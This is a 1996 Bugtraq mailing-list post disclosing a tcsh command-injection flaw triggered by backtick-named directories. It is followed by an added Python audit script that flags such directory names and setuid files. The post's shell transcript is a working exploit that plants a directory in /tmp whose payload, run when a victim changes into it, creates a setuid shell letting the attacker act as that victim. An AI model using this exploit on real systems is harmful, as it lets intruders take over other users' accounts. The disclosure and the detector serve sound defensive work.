Bugtraq mailing list archives
tee see shell problems
From: butafuco () mc net (test)
Date: Fri, 13 Sep 1996 09:03:00 -0500
A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed out with BSDI anyway) that allows the execution of arbitrary commands when changing into directories that are enclosed with backticks. The problem might also prove to be quite bad for tcsh scripts that find themselves changing into directories on the fly.

Here is probably one of the dumbest methods possible that could be used to exploit this weakness.

----------------------------Cut to Bad guy--------------------------------
jim% whoami
Evol bad guy
jim% mkdir /tmp/\`source\ .WaReZ\`
jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
jim% chmod +x /tmp/*W*/.WaReZ
---------------------------Cut to unsuspecting foo------------------------
jim% whoami
Unsuspecting foo
jim% echo $SHELL
/bin/tcsh
jim% I just like to check that sometimes.
jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim% cd /tmp
jim% ls
`source .WaReZ`
jim% OH BOY!!! the jack pot!
jim% cd *WaReZ*
jim% ls
jim% oh, oh well maybe I'll check later...
jim% cd $HOME
----------------------------Cut to More Bad guy--------------------------
jim% ls -a /tmp/*W*/
. .. .24753
jim% /tmp/*W*/.24753
$whoami
unsuspecting foo
$ hah.
---------------------------End Unix Parable-------------------------------
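
A defender-side audit for the condition described in the message above, as an added example that is not part of the original post: it walks a shared directory such as /tmp and reports directories whose names contain a backtick, plus any setuid files left under the tree. The function names, the extra `$(` token and the inert sample tree are assumptions constructed for illustration.

```python
import os
import stat
import tempfile

# Backticks are the case from the post; "$(" is an added assumption that
# covers the equivalent command-substitution syntax in Bourne-type shells.
SUSPICIOUS = ("`", "$(")

def audit_tree(root):
    """Return (risky_dirs, setuid_files) found under root.

    risky_dirs: directories whose own name contains a SUSPICIOUS token.
    setuid_files: regular files with the setuid bit set.
    Symlinks are not followed, so a planted link cannot redirect the walk.
    """
    risky_dirs, setuid_files = [], []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for d in dirnames:
            if any(tok in d for tok in SUSPICIOUS):
                risky_dirs.append(os.path.join(dirpath, d))
        for f in filenames:
            path = os.path.join(dirpath, f)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # entry vanished or is unreadable; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                setuid_files.append(path)
    return sorted(risky_dirs), sorted(setuid_files)

def build_sample(root):
    """Constructed sample tree with the layout from the post (inert files)."""
    bad = os.path.join(root, "`source .WaReZ`")
    os.mkdir(bad)
    os.mkdir(os.path.join(root, "normal"))
    dropped = os.path.join(bad, ".24753")
    with open(dropped, "w") as fh:
        fh.write("placeholder\n")
    os.chmod(dropped, 0o4755)  # same mode as the chmod 4755 in the post
    return bad, dropped

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        dirs, suid = audit_tree(tmp)
        print("suspicious directory names:", [repr(d) for d in dirs])
        print("setuid files:", suid)
```

Paths are printed with repr() so that a reported name is never pasted back into a shell unquoted.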